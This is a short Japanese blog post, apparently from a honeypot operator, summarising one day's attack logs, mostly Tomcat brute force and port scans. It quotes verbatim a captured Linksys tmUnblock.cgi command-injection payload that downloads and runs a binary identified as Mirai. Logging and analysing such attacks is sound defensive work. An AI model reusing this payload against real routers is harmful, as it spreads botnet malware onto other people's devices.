4/24日分を分析していきたいと思います。

総アクセス数4542

アクセス先

GET http://[ip]/echo.php         // []内は伏せておきます
GET http://[ip]/testget?q=23333&port=80

GET /manager/html  
GET http://www.neti.ee/?[]
GET http://m.baidu.com/?[]
POST /tmUnblock.cgi

8080番ポートへのスキャン

感想

今回も、ログの殆どがTomcatに対する攻撃でした。 内容はしっかりと分析していませんが、殆どが総当りでしょう。

気になった攻撃はtmUnblock.cgiの部分ですね、調べてみると Linksys（ルーター)の脆弱性を突いた攻撃っぽいです

ttcp_ip=-h+`cd+/tmp;+rm+-rf+mpsl;+wget+http://[IP]/vb/mpsl;+chmod+777+mpsl;+./mpsl+linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

virus totalに突っ込んでみるとmiraiと帰ってきました。　派生系などが中々流行ってるみたいですね。

詳しくは後々追記していきます。